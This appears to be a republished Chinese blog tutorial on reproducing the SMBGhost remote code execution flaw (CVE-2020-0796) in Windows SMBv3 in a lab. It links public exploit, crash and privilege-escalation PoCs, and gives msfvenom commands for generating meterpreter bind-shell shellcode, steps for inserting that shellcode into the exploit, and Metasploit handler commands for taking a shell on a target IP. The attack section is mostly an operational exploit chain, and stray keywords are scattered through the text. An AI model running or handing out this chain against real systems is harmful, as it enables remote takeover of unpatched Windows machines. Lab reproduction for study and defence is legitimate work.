CVE-2020-0796:微軟 SMBv3 協議RCE復現

簡介python

SMB(全稱是Server Message Block)是一個協議名,它能被用於Web鏈接和客戶端與服務器之間的信息溝通。git

漏洞概述github

(CVE-2020-0796 SMBGhost)該漏洞是因爲SMBv3協議在處理惡意的壓縮數據包時出錯所形成的,它可以讓遠程且未經身份驗證的攻擊者在目標系統上執行任意代碼。該漏洞的後果十分接近永恆之藍系列,都利用Windows SMB漏洞遠程攻擊獲取系統最高權限,WannaCry勒索蠕蟲就是利用永恆之藍系列漏洞攻擊工具製造的大災難。shell

影響版本windows

適用於32位系統的Windows 10版本1903服務器

Windows 10 1903版(用於基於x64的系統)微信

Windows 10 1903版(用於基於ARM64的系統)app

Windows Server 1903版(服務器核心安裝)tcp

適用於32位系統的Windows 10版本1909ide

Windows 10版本1909(用於基於x64的系統)

Windows 10 1909版(用於基於ARM64的系統)

Windows Server版本1909(服務器核心安裝)

這裏是我使用的Windows10版本的靶機

環境搭建
Kali虛擬機以及windows10虛擬機
可在虛擬機中搭建win10系統來進行復現。迅雷連接:

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/

使用掃描工具來驗證是否由該漏洞

https://github.com/ollypwn/SMBGhost

能夠看到該版本是具備SMBv3 RCE漏洞的

漏洞復現
EXP地址:

https://github.com/chompie1337/SMBGhost_RCE_PoC

該exp使用環境爲python3
下載完成後將該exp放到Kali虛擬機中
啓動msf,使用msf生成shellcode
命令爲:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

若是不輸入爲txt就使用這一條

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python

執行該命令後會在同目錄下生成一個shellcode.txt,將生成的shellcode替換exp中的exploit.py中的USER_PAYLOAD保存便可。

替換到exploit.py裏面。注意這裏MSF給出的是buf 在exploit.py裏面是USER_PAYLOAD 這個須要修改一下

修改好了exp文件以後,在MSF上面設置監聽

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 8888

set rhost 192.168.8.138

run

使用exp對windows進行反彈shell。這裏成功了而且沒有藍屏的現象

藍屏的POC。這個POC能夠把由這個漏洞的windows10系統打到藍屏

https://github.com/eerykitty/CVE-2020-0796-PoC

在執行的時候須要注意要安裝一些包和注意路徑的問題

本地提權POC

https://github.com/danigargu/CVE-2020-0796

編譯好了的版本以下:

https://github.com/danigargu/CVE-2020-0796/releases


滲透測試 紅隊攻防 免殺 權限維持 等等技術 

及時分享最新漏洞復現以及EXP 國內外最新技術分享!!!

進來一塊兒學習吧



本文分享自微信公衆號 - 黑白天(li0981jing)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索